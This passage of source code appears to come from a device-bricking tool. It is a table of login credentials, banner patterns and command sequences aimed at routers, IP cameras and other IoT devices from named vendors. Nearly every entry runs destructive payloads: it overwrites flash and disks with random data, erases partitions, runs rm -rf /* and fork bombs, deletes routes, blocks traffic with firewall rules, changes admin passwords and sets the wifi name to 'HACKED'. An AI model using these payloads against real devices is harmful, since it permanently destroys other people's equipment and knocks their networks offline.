 'wan delete service ipoe_eth0_3' , '[#>]' ,
2634
 'wan delete service ipoe_eth0_2' , '[#>]' ,
2635
 'wan delete service ipoe_eth0_1' , '[#>]' ,
2636
 'restoredefault' , '' ,
2637
 'exit' , '' ,
2638
 'loaddefaultconfig' , '[#>]' ,
2639
 'adsl connection --loopback' , '' ,
2640
 'xdslctl connection --loopback' , '' ,
2641
 'ppp config ppp0 down' , '' ,
2642
 'ppp config ppp0.1 down' , '' ,
2643
 'ppp config ppp0.2 down' , '' ,
2644
 'ppp config ppp1 down' , '' ,
2645
 'ppp config ppp1.1 down' , '' ,
2646
 'ppp config ppp2.1 down' , '' ,
2647
 'ppp config ppp3.3 down' , '' ,
2648
 'ppp config pppo3G0 down' , '' ,
2649
 'save' , '' ,
2650
 'defaultgateway config ppp0' , '' ,
2651
 'defaultgateway config ppp1.1' , '' ,
2652
 'defaultgateway config ppp2.1' , '' ,
2653
 'save' , '' ,
2654
 'wan delete service ppp0' , '[#>]' ,
2655
 'wan delete service ppp0.1' , '[#>]' ,
2656
 'wan delete service ppp1.1' , '[#>]' ,
2657
 'wan delete service pppoa1' , '[#>]' ,
2658
 'wan delete service pppoa0' , '[#>]' ,
2659
 'wan delete service ppp0.2' , '[#>]' ,
2660
 'wan delete service ppp1.2' , '[#>]' ,
2661
 'wan delete service ppp2.1' , '[#>]' ,
2662
 'wan delete service eth4.1' , '[#>]' ,
2663
 'wan delete service eth4.2' , '[#>]' ,
2664
 'wan delete service ipoe_eth0_4' , '[#>]' ,
2665
 'wan delete service ipoe_eth0_3' , '[#>]' ,
2666
 'wan delete service ipoe_eth0_2' , '[#>]' ,
2667
 'wan delete service ipoe_eth0_1' , '[#>]' ,
2668
 'restoredefault' , '' ,
2669
 'reboot' , ''
2670
 ] ,
2671
 [ "broadcom" , ".*" , 'support:\S+:0:0:Technical Support:.:.bin.sh' ,
2672
 'lan config --ipaddr primary 10.1.2.3 255.255.255.255' , '' ,
2673
 'lan config --ipaddr secondary 10.1.2.4 255.255.255.255' , '' ,
2674
 'wlan config --ssid "HACKED: DEFAULT PASSWORD"' , '' ,
2675
 'wlan config --enable 0' , '' ,
2676
 'wlan config --ssid primary "HACKED: DEFAULT PASSWORD"' , '' ,
2677
 'wlan config --status primary disable' , '' ,
2678
 'save' , '' ,
2679
 'tr69cfg --inform disable' , '' ,
2680
 'tr69cfg --connreq disable' , '' ,
2681
 'tr69cfg --password HACKED' , '' ,
2682
 'tr69cfg --intf HACKED' , '' ,
2683
 'tr69cfg --info' , '' ,
2684
 'tr69c ConnReqPort 31351' , '' ,
2685
 'save' , '' ,
2686
 'sh' , '[$>#] ' ,
2687
 'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#] ' ,
2688
 'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#] ' ,
2689
 'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#] ' ,
2690
 'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#] ' ,
2691
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
2692
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
2693
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
2694
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
2695
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
2696
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
2697
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
2698
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
2699
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
2700
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
2701
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
2702
 'cat /dev/urandom >/dev/mtd3 &' , '' ,
2703
 'route del default;iptables -t nat -F;iptables -F;iptables -A INPUT -j DROP' , '%WAIT%' ,
2704
 "restoredefault" , '[$>#] ' ,
2705
 'reboot' , '%TERM%'
2706
 ] ,
2707
 [ "broadcom" , ".*" , 'Linux.*\(\S+txcpyjeb\S*\)' ,
2708
 'sh' , '[$>#] ' ,
2709
 'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#] ' ,
2710
 'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#] ' ,
2711
 'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#] ' ,
2712
 'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#] ' ,
2713
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
2714
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
2715
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
2716
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
2717
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
2718
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
2719
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
2720
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
2721
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
2722
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
2723
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
2724
 'cat /dev/urandom >/dev/mtd3 &' , '' ,
2725
 'route del default;iptables -t nat -F;iptables -F;iptables -A INPUT -j DROP' , '%WAIT%' ,
2726
 "restoredefault" , '[$>#] ' ,
2727
 'reboot' , '%TERM%'
2728
 ] ,
2729
[ 'broadcom' , '.*' , 'from HyperTerminal you would need to use' ,
2730
 'cat /dev/urandom >/dev/mtdblock0 &' , 'to continue' ,
2731
 '' , '' ,
2732
 'cat /dev/urandom >/dev/mtdblock1 &' , 'to continue' ,
2733
 '' , '' ,
2734
 'cat /dev/urandom >/dev/mtdblock2 &' , 'to continue' ,
2735
 '' , '' ,
2736
 'cat /dev/urandom >/dev/mtdblock3 &' , 'to continue' ,
2737
 '' , '' ,
2738
 'iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP' , 'to continue' ,
2739
 '' , '' ,
2740
 '12' , '==>' ,
2741
 '1' , 'Please wait' ,
2742
 ] ,
2743
[ 'broadcom' , 'supervisor/zyad1234' , '' ,
2744
 'dhcpserver config 192.168.99.1 192.168.99.1 1' , '' ,
2745
 'lan config --ipaddr primary 10.1.2.3 255.255.255.255' , '' ,
2746
 'lan config --ipaddr secondary 10.1.2.4 255.255.255.255' , '' ,
2747
 'wlan config --ssid "HACKED: DEFAULT PASSWORD"' , '' ,
2748
 'wlan config --enable 0' , '' ,
2749
 'save' , '' ,
2750
 'tr69cfg --inform disable' , '' ,
2751
 'tr69cfg --connreq disable' , '' ,
2752
 'tr69cfg --password HACKED' , '' ,
2753
 'tr69cfg --intf HACKED' , '' ,
2754
 'tr69cfg --info' , '' ,
2755
 'save' , '' ,
2756
 'tftp -p -f test ;flash_erase /dev/mtdblock0 0 999999 0;flash_erase /dev/mtdblock1 0 999999 0;flash_erase /dev/mtdblock2 0 999999 0;flash_erase /dev/mtdblock3 0 999999 0' , '' ,
2757
 'tftp -p -f test ;cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3' , '' ,
2758
 'tftp -p -f test ;route del default' , '' ,
2759
 "adsl connection --loopback\nxdslctl connection --loopback\nppp config ppp0 down\nppp config ppp1.1 down\nppp config ppp2.1 down\nppp config ppp3.3 down\nppp config pppo3G0 down\nsave" , '' ,
2760
 'defaultgateway config ppp0' , '' ,
2761
 'defaultgateway config ppp1.1' , '' ,
2762
 'defaultgateway config ppp2.1' , '' ,
2763
 'sh' , '[#>]' ,
2764
 'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#]' ,
2765
 'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#]' ,
2766
 'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#]' ,
2767
 'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#]' ,
2768
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
2769
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
2770
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
2771
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
2772
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
2773
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
2774
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
2775
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
2776
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
2777
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
2778
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
2779
 'cat /dev/urandom >/dev/mtd3 &' , '' ,
2780
 'route del default;iptables -F;iptables -A INPUT -j DROP' , '' ,
2781
 'poweroff -n -f' , '[#>]' ,
2782
 'poweroff' , '[#>]' ,
2783
 'restoredefault' , '' ,
2784
 'exit' , '' ,
2785
 'restoredefault' , '%TERM%'
2786
 ] ,
2787
[ 'xiongctrl' , 'admin/.*' , 'PORT:9527:' ,
2788
 'shell\nbusybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtd2 &\nbusybox cat /dev/urandom >/dev/mtd3 &\nbusybox cat /dev/urandom >/dev/mtd4 &\nbusybox cat /dev/urandom >/dev/mtd5 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\nbusybox cat /dev/urandom >/dev/mtdblock4 &\nbusybox cat /dev/urandom >/dev/mtdblock5 &\nroute del default' , '[$] ' ,
2789
 'netitf -ip\nnetitf -dhcp\nnetitf -dhcp 0\nnetitf -dns 1.2.3.4 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
2790
 'netitf -ip 1.2.3.4 255.255.255.0 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
2791
 'exit' , '[$] ' ,
2792
 'netitf -ip\nnetitf -dhcp\nnetitf -dhcp 0\nnetitf -dns 1.2.3.4 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
2793
 'netitf -ip 1.2.3.4 255.255.255.0 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
2794
 ';;' , '[$] ' ,
2795
 'netitf -ip\nnetitf -dhcp\nnetitf -dhcp 0\nnetitf -dns 1.2.3.4 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
2796
 'netitf -ip 1.2.3.4 255.255.255.0 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
2797
 ] ,
2798
[ 'baby' , '.*' , '(www\.netween\.co\.kr|rjhm91lt37eEtYB0Czii1)' ,
2799
 'cat /dev/urandom >/dev/mtdblock0 &' , '[$>#] ' ,
2800
 'cat /dev/urandom >/dev/mtdblock1 &' , '[$>#] ' ,
2801
 'cat /dev/urandom >/dev/root &' , '%WAIT%' ,
2802
 'cd /web/' , '[$>#] ' ,
2803
 'grep "reboot" *' , '[$>#] ' ,
2804
 ] ,
2805
[ 'vertex' , 'root/vertex25ektks123' , '' ,
2806
 'configure terminal' , '[$>#] ' ,
2807
 'restore factory-defaults' , '[$>#] ' ,
2808
 'exit' , '[$>#] ' ,
2809
 'quote sh' , '[$>#] ' ,
2810
 'cat /dev/urandom >/dev/root &' , '[$>#] ' ,
2811
 'cat /dev/urandom >/dev/ram &' , '[$>#] ' ,
2812
 'route del default' , '%WAIT%' ,
2813
 'reboot' ,
2814
 ] ,
2815
[ 'honeypot' , OoO0 , '' ,
2816
 'cat /etc/passwd' , '' ,
2817
 'cat /etc/shadow' , '' ,
2818
 'uname -a' , '' ,
2819
 ] ,
2820
 [ 'honeypot' , '.*' , '(fw-mgmt0|Ubuntu|el\d\.x86_?64|Debian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent|Linux\s\S+S\d\s.*x86_?64|Linux\s.*amd64.*SMP.*Debian.*x86_?64)' ,
2821
 'echo SYSTEM HACKED PLEASE REINSTALL >/etc/motd' , '' ,
2822
 'echo SYSTEM HACKED PLEASE REINSTALL >/etc/version' , '' ,
2823
 'echo SYSTEM-HACKED-PLEASE-REINSTALL >/etc/hostname' , '' ,
2824
 'wall \x1b]2;HACKED\x07' , '' ,
2825
 ] ,
2826
[ "sagemcom" , ".*" , 'HomeGateway.*\s*.*Bad\scommand.*Try\susing\shelp' ,
2827
 "conf print /admin/" , "HomeGateway> " ,
2828
 "conf set /admin/rmt_mng/ports/2/enabled 0" , "HomeGateway> " ,
2829
 "conf set /admin/rmt_mng/ports/1/enabled 0" , "HomeGateway> " ,
2830
 "conf set /admin/rmt_mng/ports/0/enabled 0" , "HomeGateway> " ,
2831
 "conf set /admin/user/2/password x" , "HomeGateway> " ,
2832
 "conf set /admin/user/1/password x" , "HomeGateway> " ,
2833
 "conf set /admin/user/0/password x" , "HomeGateway> " ,
2834
 "conf reconf 1" , "HomeGateway> " ,
2835
 "flash commit" , "HomeGateway> " ,
2836
 "system reboot" , '%TERM%' ,
2837
 ] ,
2838
 [ "sagemcom" , ".*" , 'OpenRG>' ,
2839
 "conf print /admin/" , "OpenRG> " ,
2840
 "conf set /admin/rmt_mng/ports/2/enabled 0" , "OpenRG> " ,
2841
 "conf set /admin/rmt_mng/ports/1/enabled 0" , "OpenRG> " ,
2842
 "conf set /admin/rmt_mng/ports/0/enabled 0" , "OpenRG> " ,
2843
 "conf set /admin/user/2/password x" , "OpenRG> " ,
2844
 "conf set /admin/user/1/password x" , "OpenRG> " ,
2845
 "conf set /admin/user/0/password x" , "OpenRG> " ,
2846
 "conf reconf 1" , "OpenRG> " ,
2847
 "flash commit" , "OpenRG> " ,
2848
 "system reboot" , '%TERM%' ,
2849
 ] ,
2850
[ "nomadix" , '.*' , 'Display advanced system configuration menu' ,
2851
 'system' , '\S>' ,
2852
 'factory' , 'yes/no' ,
2853
 'yes' , 'CR' ,
2854
 '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n' , 'CR' ,
2855
 '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n' , 'CR' ,
2856
 '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n' , 'CR' ,
2857
 ] ,
2858
[ 'sse' , '.*' , 'step into administration terminal' ,
2859
 '' , '~ ' ,
2860
 'd() { d|d & }; d' , '~ ' ,
2861
 ] ,
2862
[ 'cisco' , '.*' , 'User Access Verification' ,
2863
 'enable' , '\S+[#>]' ,
2864
 'erase /all nvram:' , 'confirm' ,
2865
 'y' , '\S+[#>]' ,
2866
 'erase startup-config' , 'confirm' ,
2867
 'y' , '\S+[#>]' ,
2868
 'reload' , 'yes/no' ,
2869
 'y' , 'confirm' ,
2870
 'y' , '' ,
2871
 'power rps port 6 mode standby' , '\S+[#>]' ,
2872
 'power rps port 5 mode standby' , '\S+[#>]' ,
2873
 'power rps port 4 mode standby' , '\S+[#>]' ,
2874
 'power rps port 3 mode standby' , '\S+[#>]' ,
2875
 'power rps port 2 mode standby' , '\S+[#>]' ,
2876
 'power rps port 1 mode standby' , '\S+[#>]' ,
2877
 ] ,
2878
[ 'kylink' , '.*' , 'Kylink SIP' ,
2879
 '8' , 'y/n' ,
2880
 'y' , '\):' ,
2881
 '9' , 'y/n' ,
2882
 'y' , '\):' ,
2883
 '1' , '\):' ,
2884
 '1' , '\):' ,
2885
 '1.2.3.4' , '\):' ,
2886
 '3' , '\):' ,
2887
 '1.2.3.5' , '\):' ,
2888
 'q' , '\):' ,
2889
 '9' , 'y/n' ,
2890
 'y' , '\):' ,
2891
 'b' , 'y/n' ,
2892
 'y' , 'seconds' ,
2893
 ] ,
2894
[ "dahuaold" , "root/vizxv" , '' ,
2895
'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
2896
 'busybox cat /dev/urandom >/dev/sda &' , '' ,
2897
 'busybox cat /dev/urandom >/dev/mtdblock10 &' , '' ,
2898
 'busybox cat /dev/urandom >/dev/mmc0 &' , '' ,
2899
 'busybox cat /dev/urandom >/dev/sdb &' , '' ,
2900
 'busybox cat /dev/urandom >/dev/ram0 &' , '' ,
2901
 'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
2902
 'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
2903
 'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' ,
2904
 'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' ,
2905
 'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' ,
2906
 "fdisk -C 1 -H 1 -S 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' ,
2907
 "w" , '[#$] ' ,
2908
 "fdisk -C 1 -H 1 -S 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
2909
 "w" , '[#$] ' ,
2910
 "fdisk -C 1 -H 1 -S 1 /dev/sda" , 'm\sfor\shelp\S?: ' ,
2911
 "w" , '[#$] ' ,
2912
 "fdisk -C 1 -H 1 -S 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' ,
2913
 "w" , '[#$] ' ,
2914
 'route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &' , '%WAIT%' ,
2915
 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT%' ,
2916
 "halt -n -f" , '[#$] ' ,
2917
 "reboot" , '[#$] ' ,
2918
 ] ,
2919
[ "hilinux" , ".*" , 'Welcome to HiLinux' ,
2920
'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
2921
 'busybox cat /dev/urandom >/dev/sda &' , '' ,
2922
 'busybox cat /dev/urandom >/dev/mtdblock10 &' , '' ,
2923
 'busybox cat /dev/urandom >/dev/mmc0 &' , '' ,
2924
 'busybox cat /dev/urandom >/dev/sdb &' , '' ,
2925
 'busybox cat /dev/urandom >/dev/ram0 &' , '' ,
2926
 'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
2927
 'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
2928
 'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' ,
2929
 'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' ,
2930
 'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' ,
2931
 "fdisk -C 1 -H 1 -S 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' ,
2932
 "w" , '[#$] ' ,
2933
 "fdisk -C 1 -H 1 -S 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
2934
 "w" , '[#$] ' ,
2935
 "fdisk -C 1 -H 1 -S 1 /dev/sda" , 'm\sfor\shelp\S?: ' ,
2936
 "w" , '[#$] ' ,
2937
 "fdisk -C 1 -H 1 -S 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' ,
2938
 "w" , '[#$] ' ,
2939
 'route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &' , '%WAIT%' ,
2940
 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT%' ,
2941
 "halt -n -f" , '[#$] ' ,
2942
 "reboot" , '[#$] ' ,
2943
 ] ,
2944
[ "zlx" , "root/zlxx\." , "" ,
2945
 'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
2946
 'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
2947
 'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
2948
 'busybox cat /dev/urandom >/dev/sda &' , '' ,
2949
 'busybox cat /dev/urandom >/dev/ram0 &' , '' ,
2950
 'flash_unlock /dev/mtd0' , '' ,
2951
 'flash_eraseall /dev/mtd0 &' , '' ,
2952
 'flash_unlock /dev/mtd1' , '' ,
2953
 'flash_eraseall /dev/mtd1 &' , '' ,
2954
 'flash_unlock /dev/sda' , '' ,
2955
 'flash_eraseall /dev/sda &' , '' ,
2956
 'flash_unlock /dev/mtdblock0' , '' ,
2957
 'flash_eraseall /dev/mtdblock0 &' , '' ,
2958
 "fdisk -C 1 -H 1 -S 1 /dev/sda" , 'm\sfor\shelp\S?: ' ,
2959
 "w" , '[#$] ' ,
2960
 "fdisk -C 1 -H 1 -S 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' ,
2961
 "w" , '[#$] ' ,
2962
 "fdisk -C 1 -H 1 -S 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
2963
 "w" , '[#$] ' ,
2964
 "fdisk -C 1 -H 1 -S 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' ,
2965
 "w" , '[#$] ' ,
2966
 'd(){ d|d & };d 2>/dev/null' , '[#$>] ' ,
2967
 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '[#$] ' ,
2968
 "halt -n -f" , '[#$] ' ,
2969
 "reboot" , '[#$] ' ,
2970
 ] ,
2971
[ 'netbox' , '.*' , "ERROR: no such command \'w\'" ,
2972
 'shell' , '[>#] ' ,
2973
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
2974
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
2975
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
2976
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
2977
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
2978
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
2979
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
2980
 'route del default' , '%WAIT%' ,
2981
 ] ,
2982
[ 'falcon' , '.*' , '(Unknown Command: \'|RMT:\d+.*@telnet:)' ,
2983
 'offline' , '[>#] ' ,
2984
 'offline' , '[>#] ' ,
2985
 'passwd' , 'password' ,
2986
 '%OLDPASS%' , 'password' ,
2987
 '%NEWPASS%' , 'password' ,
2988
 '%NEWPASS%' , '[>#] ' ,
2989
 'reset board' , '[>#] ' ,
2990
 'DSC sleep 99999999' , '[>#] ' ,
2991
 'ip sat0 add 1.2.3.4 255.255.255.0 1.2.3.5 sat0' , '[>#] ' ,
2992
 'params GLOBAL set max_mssg_bufs 1' , '[>#] ' ,
2993
 'params GLOBAL set initial_mssg_bufs 1' , '[>#] ' ,
2994
 'params SECURITY set falcon_console_from_localhost_only 1' , '[>#] ' ,
2995
 'params LL set ll_tx_window 1' , '[>#] ' ,
2996
 'params LL set ll_rx_window 1' , '[>#] ' ,
2997
 'params SPOOF set spoof_oos_buffer_size 1' , '[>#] ' ,
2998
 'params PAD set pad_tdma_payload 1' , '[>#] ' ,
2999
 'reset application' , '%WAIT%' ,
3000
 'ENTER_ERROR_STATE' , '[>#] ' ,
3001
 'TERMINATE' , '[>#] ' ,
3002
 ] ,
3003
[ "chin" , 'root/1001chin' , '' ,
3004
 'dd if=/dev/urandom of=/dev/sda1 &' , '' ,
3005
 'dd if=/dev/urandom of=/dev/sda2 &' , '' ,
3006
 'dd if=/dev/urandom of=/dev/sda3 &' , '' ,
3007
 'dd if=/dev/urandom of=/dev/sda4 &' , '' ,
3008
 'dd if=/dev/urandom of=/dev/sda &' , '' ,
3009
 'dd if=/dev/urandom of=/dev/root &' , '' ,
3010
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[#$>] ' ,
3011
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' ,
3012
 'd(){ d|d & };d 2>/dev/null' , '[#$>] ' ,
3013
 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' ,
3014
 'halt -n -f' , '[#$>] ' ,
3015
 'reboot' , '[#$>] ' ,
3016
 'd(){ d|d & };d' , '%TERM%' ,
3017
 ] ,
3018
[ "faraday" , "root/GM8182" , "" ,
3019
 "cat /dev/urandom >/dev/sda &\ncat /dev/urandom >/dev/mtdblock4 &\ncat /dev/urandom >/dev/mtdblock5 &\ncat /dev/urandom >/dev/mtdblock6 &\ncat /dev/urandom >/dev/mtdblock7 &\ncat /dev/urandom >/dev/mtdblock8 &\ncat /dev/urandom >/dev/root &\nroute del default" , '' ,
3020
 "fdisk -C 1 /dev/sda" , 'm\sfor\shelp\S?: ' ,
3021
 "w" , '[#$] ' ,
3022
 "fdisk -C 1 /dev/mtdblock4" , 'm\sfor\shelp\S?: ' ,
3023
 "w" , '[#$] ' ,
3024
 "fdisk -C 1 /dev/mtdblock5" , 'm\sfor\shelp\S?: ' ,
3025
 "w" , '[#$] ' ,
3026
 "fdisk -C 1 /dev/mtdblock6" , 'm\sfor\shelp\S?: ' ,
3027
 "w" , '[#$] ' ,
3028
 "fdisk -C 1 /dev/mtdblock7" , 'm\sfor\shelp\S?: ' ,
3029
 "w" , '[#$] ' ,
3030
 "fdisk -C 1 /dev/mtdblock8" , 'm\sfor\shelp\S?: ' ,
3031
 "w" , '[#$] ' ,
3032
 "fdisk -C 1 /dev/root" , 'm\sfor\shelp\S?: ' ,
3033
 "w" , '[#$] ' ,
3034
 "route del default" , '%WAIT%' ,
3035
 "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' ,
3036
 "sysctl -w kernel.threads-max=1" , '%WAIT% ' ,
3037
 "halt -n -f" , '[#$] ' ,
3038
 "reboot" , '[#$] ' ,
3039
 ] ,
3040
[ "ht-tm" , "root/20080826" , "" ,
3041
 'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
3042
 'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
3043
 'busybox cat /dev/urandom >/dev/mtd2 &' , '' ,
3044
 'busybox cat /dev/urandom >/dev/mtd3 &' , '' ,
3045
 'busybox cat /dev/urandom >/dev/mtd4 &' , '' ,
3046
 'busybox cat /dev/urandom >/dev/mtd5 &' , '' ,
3047
 'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
3048
 'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' ,
3049
 'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' ,
3050
 'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' ,
3051
 'busybox cat /dev/urandom >/dev/mtdblock4 &' , '' ,
3052
 'busybox cat /dev/urandom >/dev/mtdblock5 &' , '' ,
3053
 'route del default;rm -rf /* &' , '%TERM%' ,
3054
 ] ,
3055
[ "ht-tm" , ".*" , "root.*cIUPc1dKQYHkkKkiVpM" ,
3056
 '%RELAUNCH%' , '%RELAUNCH%' ,
3057
 ] ,
3058
[ "xiongmai" , "root/xc3511" , '' ,
3059
 "busybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtd2 &\nbusybox cat /dev/urandom >/dev/mtd3 &\nbusybox cat /dev/urandom >/dev/mtd4 &\nbusybox cat /dev/urandom >/dev/mtd5 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\nbusybox cat /dev/urandom >/dev/mtdblock4 &\nbusybox cat /dev/urandom >/dev/mtdblock5 &\nroute del default;rm -rf /* 2>/dev/null &" , '' ,
3060
 'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
3061
 'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
3062
 'busybox cat /dev/urandom >/dev/mtd2 &' , '' ,
3063
 'busybox cat /dev/urandom >/dev/mtd3 &' , '' ,
3064
 'busybox cat /dev/urandom >/dev/mtd4 &' , '' ,
3065
 'busybox cat /dev/urandom >/dev/mtd5 &' , '' ,
3066
 'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
3067
 'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' ,
3068
 'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' ,
3069
 'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' ,
3070
 'busybox cat /dev/urandom >/dev/mtdblock4 &' , '' ,
3071
 'busybox cat /dev/urandom >/dev/mtdblock5 &' , '' ,
3072
 'route del default;rm -rf /* 2>/dev/null &' , "%WAIT%" ,
3073
 "poweroff -n -f" , '%TERM%' ,
3074
 ] ,
3075
[ "xiongmai" , "root/xmhdipc" , '' ,
3076
 "busybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtd2 &\nbusybox cat /dev/urandom >/dev/mtd3 &\nbusybox cat /dev/urandom >/dev/mtd4 &\nbusybox cat /dev/urandom >/dev/mtd5 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\nbusybox cat /dev/urandom >/dev/mtdblock4 &\nbusybox cat /dev/urandom >/dev/mtdblock5 &\nroute del default;rm -rf /* 2>/dev/null &" , '' ,
3077
 'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
3078
 'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
3079
